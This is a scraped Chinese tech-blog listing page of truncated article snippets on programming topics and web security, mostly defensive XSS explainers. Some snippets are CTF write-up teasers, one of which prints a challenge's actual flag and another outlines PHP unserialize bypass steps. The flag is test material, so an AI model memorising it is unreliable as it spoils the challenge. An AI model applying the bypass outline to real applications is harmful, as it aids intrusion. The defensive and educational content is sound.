<div>linux安装完torch或者tensorflow的gpu版本，安装没问题，但是import就有问题，报错OSError:libnccl.so.2:cannotopensharedobjectfile:Nosuchfileordirectory，是缺少nvidia的ncll，下面介绍解决方法：1安装ncll下载链接https://developer.nvidia.com/nccl/nccl-dow</div> </li> <li><a href="/article/1832994512591482880.htm" title="SWPUCTF 2022 新生赛 Does your nc work？" target="_blank">SWPUCTF 2022 新生赛 Does your nc work？</a> Darklight夜曦 <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a> <div>首先打开环境，发现并没有附件，那我们直接进行nc连接看一下发现直接问我们问我们问题，让我们输入答案，直接ls查看目录，找flag最可能在的位置，然后运用cd和cat指令，搜查出flag的位置，找到了flagflag=NSSCTF{669c30b6-9b2d-437f-bef7-a8f06672f3c3}</div> </li> <li><a href="/article/1832853952610267136.htm" title="【网络安全】如何预防xss" target="_blank">【网络安全】如何预防xss</a> 不会代码的小徐 <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>XSS(Cross-SiteScripting，跨站脚本攻击)是一种代码注入攻击。攻击者通过在目标网站注入恶意脚本，使其在用户浏览器中执行，从而窃取用户敏感信息如Cookie和SessionID。CSS在前端已经被用了，为了避免歧义用了XSS作为缩写。XSS的本质是恶意代码与网站正常代码混在一起，浏览器无法分辨它们的可信度，最终导致恶意代码被执行。XSS的危害浏览器无法区分恶意代码和正常代码，它们</div> </li> <li><a href="/article/1832768596707733504.htm" title="ASP.NET Core 入门教学十六防止常见的Web攻击" target="_blank">ASP.NET Core 入门教学十六防止常见的Web攻击</a> 充值内卷 <a class="tag" taget="_blank" href="/search/asp.net/1.htm">asp.net</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a> <div>在ASP.NETCore中，防止常见的Web攻击是非常重要的，以确保应用程序的安全性。以下是一些常见的Web攻击类型及其防范措施：1.跨站脚本攻击（XSS）跨站脚本攻击（XSS）是一种通过在网页中注入恶意脚本来攻击用户的浏览器的技术。为了防止XSS攻击，可以采取以下措施：输入验证：对用户输入进行严格的验证和清理。输出编码：在将用户输入的数据插入到HTML页面中时，进行适当的编码。ASP.NETCo</div> </li> <li><a href="/article/1832754227903033344.htm" title="分析React fiber" target="_blank">分析React fiber</a> weixin_34367845 <a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%E4%B8%8E%E7%AE%97%E6%B3%95/1.htm">数据结构与算法</a><a class="tag" taget="_blank" href="/search/ViewUI/1.htm">ViewUI</a> <div>Reactfiber是最新react用的算法选择，其大概的介绍点击这里;现在的局限在现有React中，更新过程中是同步的（这个js代码的代码执行相关）同步的递归的渲染和调和fiber目的中断进程，后面还可以回到进程(work)中；为各个进程(work)分优先级；可以再次使用之前完成的进程(work)；终止后面不再使用的进程(work)；Inordertodoanyofthis,wefirstnee</div> </li> <li><a href="/article/1832738098958659584.htm" title="React 中的 Fiber 架构" target="_blank">React 中的 Fiber 架构</a> hawk2014bj <a class="tag" taget="_blank" href="/search/react.js/1.htm">react.js</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a> <div>ReactFiber介绍ReactFiber是React的一种重写和改进的核心算法，用于实现更细粒度的更新和高效的调度。它是React16版本中的一个重要更新，使得React能够更好地处理复杂和高频的用户交互。以下是对ReactFiber的详细介绍：为什么需要ReactFiber？在传统的React中，更新操作是同步的，一旦开始更新，整个组件树的更新过程不会被中断。这在处理复杂组件树或高频用户交互</div> </li> <li><a href="/article/1832657029114720256.htm" title="【web | CTF】攻防世界 Web_php_unserialize" target="_blank">【web | CTF】攻防世界 Web_php_unserialize</a> 星盾网安 <a class="tag" taget="_blank" href="/search/CTF/1.htm">CTF</a><a class="tag" taget="_blank" href="/search/-/1.htm">-</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a> <div>天命：这条反序列化题目也是比较特别，里面的漏洞知识点，在现在的php都被修复了天命：而且这次反序列化的字符串数量跟其他题目不一样file=$file;}//销毁时候触发，相当于是打印flag文件出来function__destruct(){echo@highlight_file($this->file,true);}//这个方法不会触发，估计是旧版本的php，满足某些情况所以没有触发//纯碎用来吓</div> </li> <li><a href="/article/1832635342075817984.htm" title="【网络安全 | CTF】攻防世界 Web_php_unserialize 解题详析" target="_blank">【网络安全 | CTF】攻防世界 Web_php_unserialize 解题详析</a> 秋说 <a class="tag" taget="_blank" href="/search/CTF/1.htm">CTF</a><a class="tag" taget="_blank" href="/search/CTF/1.htm">CTF</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a> <div>文章目录代码审计解题思路wakeup绕过preg_match绕过base64绕过GET传参方法二代码审计这段代码首先定义了一个名为Demo的类，包含了一个私有变量$file和三个魔术方法__construct()、__destruct()和__wakeup()。其中：__construce()方法用于初始化$file变量__destruce方法用于输出文件内容__wakeup()方法检查当前对象的</div> </li> <li><a href="/article/1832592857161101312.htm" title="HtmlSanitizer: 一个保护你的网站免受XSS攻击的.Net开源项目" target="_blank">HtmlSanitizer: 一个保护你的网站免受XSS攻击的.Net开源项目</a> 编程乐趣 <a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/.net/1.htm">.net</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a> <div>Html跨站脚本攻击（XSS）是非常常见的，比如博客评论、论坛帖子、社交媒体发布动态等一些用户提交文本的地方，都有可能遭受恶意提交Html代码。为了确保用户提交内容的安全，我们就需要对用户提交内容进行过滤。01项目简介HtmlSanitizer是一个强大的库，它能够审查和清理HTML内容，移除或转义那些可能被用于XSS攻击的标签和属性。这个工具的核心功能是提供一个安全的方式来处理用户提交的HTML</div> </li> <li><a href="/article/1832484567127257088.htm" title="github源码指引：共享内存、数据结构与算法：树形结构ListTree" target="_blank">github源码指引：共享内存、数据结构与算法：树形结构ListTree</a> 初级代码游戏 <a class="tag" taget="_blank" href="/search/github%E6%BA%90%E7%A0%81%E6%8C%87%E5%BC%95/1.htm">github源码指引</a><a class="tag" taget="_blank" href="/search/%E5%85%B1%E4%BA%AB%E5%86%85%E5%AD%98/1.htm">共享内存</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%E4%B8%8E%E7%AE%97%E6%B3%95/1.htm">数据结构与算法</a><a class="tag" taget="_blank" href="/search/github/1.htm">github</a><a class="tag" taget="_blank" href="/search/%E5%85%B1%E4%BA%AB%E5%86%85%E5%AD%98/1.htm">共享内存</a><a class="tag" taget="_blank" href="/search/%E6%A0%91/1.htm">树</a><a class="tag" taget="_blank" href="/search/%E9%93%BE%E8%A1%A8/1.htm">链表</a> <div>初级代码游戏的专栏介绍与文章目录-CSDN博客我的github：codetoys，所有代码都将会位于ctfc库中。已经放入库中我会指出在库中的位置。这些代码大部分以Linux为目标但部分代码是纯C++的，可以在任何平台上使用。专题：共享内存、数据结构与算法_初级代码游戏的博客-CSDN博客本文讲解带有子项的链表。一、介绍与上一篇介绍的单向链表相比，多了一个子项指针。可以理解为原来的链表是兄弟关系，</div> </li> <li><a href="/article/1832422786732224512.htm" title="Vue + ElementUI 实现全国各个省份相对应城市的联动选择_vue+elementui 省市区联动" target="_blank">Vue + ElementUI 实现全国各个省份相对应城市的联动选择_vue+elementui 省市区联动</a> 2401_84617681 <a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">程序员</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a> <div>打开全栈工匠技能包-1小时轻松掌握SSR两小时精通jq+bs插件开发生产环境下如歌部署Node.js开源分享：【大厂前端面试题解析+核心总结学习笔记+真实项目实战+最新讲解视频】网易内部VUE自定义插件库NPM集成谁说前端不用懂安全，XSS跨站脚本的危害webpack的loader到底是什么样的？两小时带你写一个自己loader:rules="rules"label-width="150px">定</div> </li> <li><a href="/article/1832250071379439616.htm" title="【无标题】XSS安全防护：responseBody （输入流可重复读）配置" target="_blank">【无标题】XSS安全防护：responseBody （输入流可重复读）配置</a> syfjava <a class="tag" taget="_blank" href="/search/RuoYi-Vue-Plus/1.htm">RuoYi-Vue-Plus</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/RuoYi-Vue-Plus/1.htm">RuoYi-Vue-Plus</a> <div>接上文：配置XSS过滤器XXS安全防护：拦截器+注解实现校验-CSDN博客XSS（跨站脚本）攻击是一种网络安全威胁，允许攻击者注入恶意脚本到看似安全的网站。当用户浏览这些被注入恶意代码的网页时，恶意脚本会在用户的浏览器环境中执行，这可能导致多种安全问题，如窃取敏感数据、劫持用户会话等。这些攻击利用了应用程序对用户输入处理不当的问题。预防方法包括输入验证、输出编码等。https://blog.csd</div> </li> <li><a href="/article/1832235444989947904.htm" title="Node.js 入门：中间件与安全性深度解析" target="_blank">Node.js 入门：中间件与安全性深度解析</a> Switch616 <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/node.js/1.htm">node.js</a><a class="tag" taget="_blank" href="/search/%E4%B8%AD%E9%97%B4%E4%BB%B6/1.htm">中间件</a><a class="tag" taget="_blank" href="/search/chrome/1.htm">chrome</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E6%A1%86%E6%9E%B6/1.htm">前端框架</a> <div>Node.js入门：中间件与安全性深度解析目录认证与授权使用jsonwebtoken实现JWT身份验证用户注册与登录：认证流程与实践️权限管理：安全访问控制详解️安全性防止SQL注入：参数化查询与ORM的最佳实践防止XSS攻击：用户输入处理与安全防护使用HTTPS和SSL/TLS：加密传输与数据安全⚠️错误处理️全局错误处理：确保应用稳定性的关键异常捕获与日志记录：有效排查问题的核心认证与授权使用</div> </li> <li><a href="/article/1832190672044650496.htm" title="springcloud-Finchley.SR1" target="_blank">springcloud-Finchley.SR1</a> 霹雳解锋镝 <div>主依赖com.lhmypinyougou1.0-SNAPSHOTjarmypinyougouDemoprojectforSpringBootmanager-uimanager-serverpinyougou-commoneureka-serverorg.springframework.bootspring-boot-starter-parent2.0.5.RELEASEUTF-8UTF-81.8o</div> </li> <li><a href="/article/1832184001641672704.htm" title="Java12 Excel和Json文件解析" target="_blank">Java12 Excel和Json文件解析</a> Stringzhua <a class="tag" taget="_blank" href="/search/JavaSE/1.htm">JavaSE</a><a class="tag" taget="_blank" href="/search/excel/1.htm">excel</a><a class="tag" taget="_blank" href="/search/json/1.htm">json</a> <div>Excel文件解析：Excel文件解析(EasyExcel框架解析)Excel文件解析(ApachePOl框架解析)（1）Excel文件对象创建：POI《1》创建工作簿对象:XSSFWorkbookworkbook=newXSSFWorkbook（）；《2》创建工作表对象：XSSFSheetsheet=workbook.createSheet();《3》创建行对象：Rowrow=sheet.cre</div> </li> <li><a href="/article/1832145171924480000.htm" title="【网络安全】Bingbot索引投毒实现储存型XSS" target="_blank">【网络安全】Bingbot索引投毒实现储存型XSS</a> 秋说 <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a> <div>未经许可，不得转载。文章目录前言Bingbot如何运作正文漏洞步骤前言Bing是由微软开发的搜索引擎，提供网页、视频、图片和地图等多种搜索功能。其目标是通过呈现有条理且相关的搜索结果，帮助用户做出更明智的决策。Bingbot是微软开发的网络爬虫，也被称为蜘蛛或搜索引擎机器人，主要用于探索和索引Bing搜索引擎的网页。自2010年10月推出以来，Bingbot通过外部和内部链接发现新网页，并更新已存</div> </li> <li><a href="/article/26.htm" title="设计模式介绍" target="_blank">设计模式介绍</a> tntxia <a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a> <div>设计模式来源于土木工程师克里斯托弗亚历山大（http://en.wikipedia.org/wiki/Christopher_Alexander）的早期作品。他经常发表一些作品，内容是总结他在解决设计问题方面的经验，以及这些知识与城市和建筑模式之间有何关联。有一天，亚历山大突然发现，重复使用这些模式可以让某些设计构造取得我们期望的最佳效果。亚历山大与萨拉-石川佳纯和穆雷西乐弗斯坦合作</div> </li> <li><a href="/article/153.htm" title="android高级组件使用(一)" target="_blank">android高级组件使用(一)</a> 百合不是茶 <a class="tag" taget="_blank" href="/search/android/1.htm">android</a><a class="tag" taget="_blank" href="/search/RatingBar/1.htm">RatingBar</a><a class="tag" taget="_blank" href="/search/Spinner/1.htm">Spinner</a> <div>1、自动完成文本框（AutoCompleteTextView） AutoCompleteTextView从EditText派生出来，实际上也是一个文本编辑框，但它比普通编辑框多一个功能：当用户输入一个字符后，自动完成文本框会显示一个下拉菜单，供用户从中选择，当用户选择某个菜单项之后，AutoCompleteTextView按用户选择自动填写该文本框。使用AutoCompleteTex</div> </li> <li><a href="/article/280.htm" title="[网络与通讯]路由器市场大有潜力可挖掘" target="_blank">[网络与通讯]路由器市场大有潜力可挖掘</a> comsci <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div> 如果国内的电子厂商和计算机设备厂商觉得手机市场已经有点饱和了,那么可以考虑一下交换机和路由器市场的进入问题..... 这方面的技术和知识,目前处在一个开放型的状态,有利于各类小型电子企业进入 &nbs</div> </li> <li><a href="/article/407.htm" title="自写简单Redis内存统计shell" target="_blank">自写简单Redis内存统计shell</a> 商人shang <a class="tag" taget="_blank" href="/search/Linux+shell/1.htm">Linux shell</a><a class="tag" taget="_blank" href="/search/%E7%BB%9F%E8%AE%A1Redis%E5%86%85%E5%AD%98/1.htm">统计Redis内存</a> <div>#!/bin/bash address="192.168.150.128:6666,192.168.150.128:6666" hosts=(${address//,/ }) sfile="staticts.log" for hostitem in ${hosts[@]} do ipport=(${hostitem</div> </li> <li><a href="/article/534.htm" title="单例模式(饿汉 vs懒汉)" target="_blank">单例模式(饿汉 vs懒汉)</a> oloz <a class="tag" taget="_blank" href="/search/%E5%8D%95%E4%BE%8B%E6%A8%A1%E5%BC%8F/1.htm">单例模式</a> <div>package 单例模式; /* * 应用场景:保证在整个应用之中某个对象的实例只有一个 * 单例模式种的《懒汉模式》 * */ public class Singleton { //01 将构造方法私有化，外界就无法用new Singleton()的方式获得实例 private Singleton(){}; //02 申明类得唯一实例 priva</div> </li> <li><a href="/article/661.htm" title="springMvc json支持" target="_blank">springMvc json支持</a> 杨白白 <a class="tag" taget="_blank" href="/search/json+springmvc/1.htm">json springmvc</a> <div>1.Spring mvc处理json需要使用jackson的类库，因此需要先引入jackson包 2在spring mvc中解析输入为json格式的数据:使用@RequestBody来设置输入 @RequestMapping("helloJson") public @ResponseBody JsonTest helloJson() { </div> </li> <li><a href="/article/788.htm" title="android播放，掃描添加本地音頻文件" target="_blank">android播放，掃描添加本地音頻文件</a> 小桔子 <div> 最近幾乎沒有什麽事情，繼續鼓搗我的小東西。想在項目中加入一個簡易的音樂播放器功能，就像華為p6桌面上那麼大小的音樂播放器。用過天天動聽或者QQ音樂播放器的人都知道，可已通過本地掃描添加歌曲。不知道他們是怎麼實現的，我覺得應該掃描設備上的所有文件，過濾出音頻文件，每個文件實例化為一個實體，記錄文件名、路徑、歌手、類型、大小等信息。具體算法思想，</div> </li> <li><a href="/article/915.htm" title="oracle常用命令" target="_blank">oracle常用命令</a> aichenglong <a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/dba/1.htm">dba</a><a class="tag" taget="_blank" href="/search/%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/1.htm">常用命令</a> <div>1 创建临时表空间 create temporary tablespace user_temp tempfile 'D:\oracle\oradata\Oracle9i\user_temp.dbf' size 50m autoextend on next 50m maxsize 20480m extent management local</div> </li> <li><a href="/article/1042.htm" title="25个Eclipse插件" target="_blank">25个Eclipse插件</a> AILIKES <a class="tag" taget="_blank" href="/search/eclipse%E6%8F%92%E4%BB%B6/1.htm">eclipse插件</a> <div>提高代码质量的插件1. FindBugsFindBugs可以帮你找到Java代码中的bug，它使用Lesser GNU Public License的自由软件许可。2. CheckstyleCheckstyle插件可以集成到Eclipse IDE中去，能确保Java代码遵循标准代码样式。3. ECLemmaECLemma是一款拥有Eclipse Public License许可的免费工具，它提供了</div> </li> <li><a href="/article/1169.htm" title="Spring MVC拦截器+注解方式实现防止表单重复提交" target="_blank">Spring MVC拦截器+注解方式实现防止表单重复提交</a> baalwolf <a class="tag" taget="_blank" href="/search/spring+mvc/1.htm">spring mvc</a> <div>原理：在新建页面中Session保存token随机码，当保存时验证，通过后删除，当再次点击保存时由于服务器端的Session中已经不存在了，所有无法验证通过。 1.新建注解： ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 </div> </li> <li><a href="/article/1296.htm" title="《Javascript高级程序设计(第3版)》闭包理解" target="_blank">《Javascript高级程序设计(第3版)》闭包理解</a> bijian1013 <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a> <div>“闭包是指有权访问另一个函数作用域中的变量的函数。”--《Javascript高级程序设计(第3版)》看以下代码： <script type="text/javascript"> function outer() { var i = 10; return f</div> </li> <li><a href="/article/1423.htm" title="AngularJS Module类的方法" target="_blank">AngularJS Module类的方法</a> bijian1013 <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/AngularJS/1.htm">AngularJS</a><a class="tag" taget="_blank" href="/search/Module/1.htm">Module</a> <div> AngularJS中的Module类负责定义应用如何启动，它还可以通过声明的方式定义应用中的各个片段。我们来看看它是如何实现这些功能的。一.Main方法在哪里如果你是从Java或者Python编程语言转过来的，那么你可能很想知道AngularJS里面的main方法在哪里？这个把所</div> </li> <li><a href="/article/1550.htm" title="[Maven学习笔记七]Maven插件和目标" target="_blank">[Maven学习笔记七]Maven插件和目标</a> bit1129 <a class="tag" taget="_blank" href="/search/maven%E6%8F%92%E4%BB%B6/1.htm">maven插件</a> <div>插件(plugin)和目标(goal) Maven，就其本质而言，是一个插件执行框架，Maven的每个目标的执行逻辑都是由插件来完成的，一个插件可以有1个或者几个目标，比如maven-compiler-plugin插件包含compile和testCompile，即maven-compiler-plugin提供了源代码编译和测试源代码编译的两个目标使用插件和目标使得我们可以干预</div> </li> <li><a href="/article/1677.htm" title="【Hadoop八】Yarn的资源调度策略" target="_blank">【Hadoop八】Yarn的资源调度策略</a> bit1129 <a class="tag" taget="_blank" href="/search/hadoop/1.htm">hadoop</a> <div>1. Hadoop的三种调度策略 Hadoop提供了3中作业调用的策略， FIFO Scheduler Fair Scheduler Capacity Scheduler 以上三种调度算法，在Hadoop MR1中就引入了，在Yarn中对它们进行了改进和完善.Fair和Capacity Scheduler用于多用户共享的资源调度 2. 多用户资源共享的调度 </div> </li> <li><a href="/article/1804.htm" title="Nginx使用Linux内存加速静态文件访问" target="_blank">Nginx使用Linux内存加速静态文件访问</a> ronin47 <div>Nginx是一个非常出色的静态资源web服务器。如果你嫌它还不够快，可以把放在磁盘中的文件，映射到内存中，减少高并发下的磁盘IO。先做几个假设。nginx.conf中所配置站点的路径是/home/wwwroot/res，站点所对应文件原始存储路径：/opt/web/res shell脚本非常简单，思路就是拷贝资源文件到内存中，然后在把网站的静态文件链接指向到内存中即可。具体如下： </div> </li> <li><a href="/article/1931.htm" title="关于Unity3D中的Shader的知识" target="_blank">关于Unity3D中的Shader的知识</a> brotherlamp <a class="tag" taget="_blank" href="/search/unity/1.htm">unity</a><a class="tag" taget="_blank" href="/search/unity%E8%B5%84%E6%96%99/1.htm">unity资料</a><a class="tag" taget="_blank" href="/search/unity%E6%95%99%E7%A8%8B/1.htm">unity教程</a><a class="tag" taget="_blank" href="/search/unity%E8%A7%86%E9%A2%91/1.htm">unity视频</a><a class="tag" taget="_blank" href="/search/unity%E8%87%AA%E5%AD%A6/1.htm">unity自学</a> <div>首先先解释下Unity3D的Shader，Unity里面的Shaders是使用一种叫ShaderLab的语言编写的，它同微软的FX文件或者NVIDIA的CgFX有些类似。传统意义上的vertex shader和pixel shader还是使用标准的Cg/HLSL 编程语言编写的。因此Unity文档里面的Shader，都是指用ShaderLab编写的代码，然后我们来看下Unity3D自带的60多个S</div> </li> <li><a href="/article/2058.htm" title="CopyOnWriteArrayList vs ArrayList" target="_blank">CopyOnWriteArrayList vs ArrayList</a> bylijinnan <a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>package com.ljn.base; import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.concurrent.CopyOnWriteArrayList; /** * 总述： * 1.ArrayListi不是线程安全的，CopyO</div> </li> <li><a href="/article/2185.htm" title="内存中栈和堆的区别" target="_blank">内存中栈和堆的区别</a> chicony <a class="tag" taget="_blank" href="/search/%E5%86%85%E5%AD%98/1.htm">内存</a> <div> 1、内存分配方面：堆：一般由程序员分配释放，若程序员不释放，程序结束时可能由OS回收。注意它与数据结构中的堆是两回事，分配方式是类似于链表。可能用到的关键字如下：new、malloc、delete、free等等。栈：由编译器(Compiler)自动分配释放，存放函数的参数值，局部变量的值等。其操作方式类似于数据结构中</div> </li> <li><a href="/article/2312.htm" title="回答一位网友对Scala的提问" target="_blank">回答一位网友对Scala的提问</a> chenchao051 <a class="tag" taget="_blank" href="/search/scala/1.htm">scala</a><a class="tag" taget="_blank" href="/search/map/1.htm">map</a> <div>本来准备在私信里直接回复了，但是发现不太方便，就简要回答在这里。问题写道对于scala的简洁十分佩服，但又觉得比较晦涩，例如一例，Map("a" -> List(11,111)).flatMap(_._2)，可否说下最后那个函数做了什么，真正在开发的时候也会如此简洁？谢谢先回答一点，在实际使用中，Scala毫无疑问就是这么简单。</div> </li> <li><a href="/article/2439.htm" title="mysql 取每组前几条记录" target="_blank">mysql 取每组前几条记录</a> daizj <a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/%E5%88%86%E7%BB%84/1.htm">分组</a><a class="tag" taget="_blank" href="/search/%E6%9C%80%E5%A4%A7%E5%80%BC/1.htm">最大值</a><a class="tag" taget="_blank" href="/search/%E6%9C%80%E5%B0%8F%E5%80%BC/1.htm">最小值</a><a class="tag" taget="_blank" href="/search/%E6%AF%8F%E7%BB%84%E4%B8%89%E6%9D%A1%E8%AE%B0%E5%BD%95/1.htm">每组三条记录</a> <div>一、对分组的记录取前N条记录：例如：取每组的前3条最大的记录 1.用子查询： SELECT * FROM tableName a WHERE 3> (SELECT COUNT(*) FROM tableName b WHERE b.id=a.id AND b.cnt>a. cnt) ORDER BY a.id,a.account DE</div> </li> <li><a href="/article/2566.htm" title="HTTP深入浅出 http请求" target="_blank">HTTP深入浅出 http请求</a> dcj3sjt126com <a class="tag" taget="_blank" href="/search/http/1.htm">http</a> <div> HTTP(HyperText Transfer Protocol)是一套计算机通过网络进行通信的规则。计算机专家设计出HTTP，使HTTP客户（如Web浏览器）能够从HTTP服务器(Web服务器)请求信息和服务，HTTP目前协议的版本是1.1.HTTP是一种无状态的协议，无状态是指Web浏览器和Web服务器之间不需要建立持久的连接，这意味着当一个客户端向服务器端发出请求，然后We</div> </li> <li><a href="/article/2693.htm" title="判断MySQL记录是否存在方法比较" target="_blank">判断MySQL记录是否存在方法比较</a> dcj3sjt126com <a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a> <div>把数据写入到数据库的时，常常会碰到先要检测要插入的记录是否存在，然后决定是否要写入。　　我这里总结了判断记录是否存在的常用方法：　　sql语句： select count ( * ) from tablename; 　　然后读取count(*)的值判断记录是否存在。对于这种方法性能上有些浪费，我们只是想判断记录记录是否存在，没有必要全部都查出来。</div> </li> <li><a href="/article/2820.htm" title="对HTML XML的一点认识" target="_blank">对HTML XML的一点认识</a> e200702084 <a class="tag" taget="_blank" href="/search/html/1.htm">html</a><a class="tag" taget="_blank" href="/search/xml/1.htm">xml</a> <div>感谢http://www.w3school.com.cn提供的资料 HTML 文档中的每个成分都是一个节点。节点根据 DOM，HTML 文档中的每个成分都是一个节点。 DOM 是这样规定的：整个文档是一个文档节点每个 HTML 标签是一个元素节点包含在 HTML 元素中的文本是文本节点每一个 HTML 属性是一个属性节点注释属于注释节点 Node 层次 </div> </li> <li><a href="/article/2947.htm" title="jquery分页插件" target="_blank">jquery分页插件</a> genaiwei <a class="tag" taget="_blank" href="/search/jquery/1.htm">jquery</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%88%86%E9%A1%B5/1.htm">分页</a><a class="tag" taget="_blank" href="/search/%E6%8F%92%E4%BB%B6/1.htm">插件</a> <div>//jquery页码控件// 创建一个闭包 (function($) { // 插件的定义 $.fn.pageTool = function(options) { var totalPa</div> </li> <li><a href="/article/3201.htm" title="Mybatis与Ibatis对照入门于学习" target="_blank">Mybatis与Ibatis对照入门于学习</a> Josh_Persistence <a class="tag" taget="_blank" href="/search/mybatis/1.htm">mybatis</a><a class="tag" taget="_blank" href="/search/ibatis/1.htm">ibatis</a><a class="tag" taget="_blank" href="/search/%E5%8C%BA%E5%88%AB/1.htm">区别</a><a class="tag" taget="_blank" href="/search/%E8%81%94%E7%B3%BB/1.htm">联系</a> <div>一、为什么使用IBatis/Mybatis 对于从事 Java EE 的开发人员来说，iBatis 是一个再熟悉不过的持久层框架了，在 Hibernate、JPA 这样的一站式对象 / 关系映射（O/R Mapping）解决方案盛行之前，iBaits 基本是持久层框架的不二选择。即使在持久层框架层出不穷的今天，iBatis 凭借着易学易用、</div> </li> <li><a href="/article/3328.htm" title="C中怎样合理决定使用那种整数类型？" target="_blank">C中怎样合理决定使用那种整数类型？</a> 秋风扫落叶 <a class="tag" taget="_blank" href="/search/c/1.htm">c</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B/1.htm">数据类型</a> <div>如果需要大数值(大于32767或小于32767), 使用long 型。否则, 如果空间很重要 (如有大数组或很多结构), 使用 short 型。除此之外, 就使用 int 型。如果严格定义的溢出特征很重要而负值无关紧要, 或者你希望在操作二进制位和字节时避免符号扩展的问题, 请使用对应的无符号类型。但是, 要注意在表达式中混用有符号和无符号值的情况。 &nbs</div> </li> <li><a href="/article/3455.htm" title="maven问题" target="_blank">maven问题</a> zhb8015 <a class="tag" taget="_blank" href="/search/maven%E9%97%AE%E9%A2%98/1.htm">maven问题</a> <div> 问题1： Eclipse 中新建maven项目无法添加src/main/java 问题 eclipse创建maevn web项目，在选择maven_archetype_web原型后，默认只有src/main/resources这个Source Floder。按照maven目录结构，添加src/main/ja</div> </li> <li><a href="/article/3582.htm" title="(二)androidpn-server tomcat版源码解析之--push消息处理" target="_blank">(二)androidpn-server tomcat版源码解析之--push消息处理</a> spjich <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/androdipn/1.htm">androdipn</a><a class="tag" taget="_blank" href="/search/%E6%8E%A8%E9%80%81/1.htm">推送</a> <div>在 (一)androidpn-server tomcat版源码解析之--项目启动这篇中，已经描述了整个推送服务器的启动过程，并且把握到了消息的入口即XmppIoHandler这个类，今天我将继续往下分析下面的核心代码，主要分为3大块，链接创建，消息的发送，链接关闭。先贴一段XmppIoHandler的部分代码 /** * Invoked from an I/O proc</div> </li> <li><a href="/article/3709.htm" title="用js中的formData类型解决ajax提交表单时文件不能被serialize方法序列化的问题" target="_blank">用js中的formData类型解决ajax提交表单时文件不能被serialize方法序列化的问题</a> 中华好儿孙 <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/Ajax/1.htm">Ajax</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/%E4%B8%8A%E4%BC%A0%E6%96%87%E4%BB%B6/1.htm">上传文件</a><a class="tag" taget="_blank" href="/search/FormData/1.htm">FormData</a> <div> var formData = new FormData($("#inputFileForm")[0]); $.ajax({ type:'post', url:webRoot+"/electronicContractUrl/webapp/uploadfile", data:formData, async: false, ca</div> </li> <li><a href="/article/3836.htm" 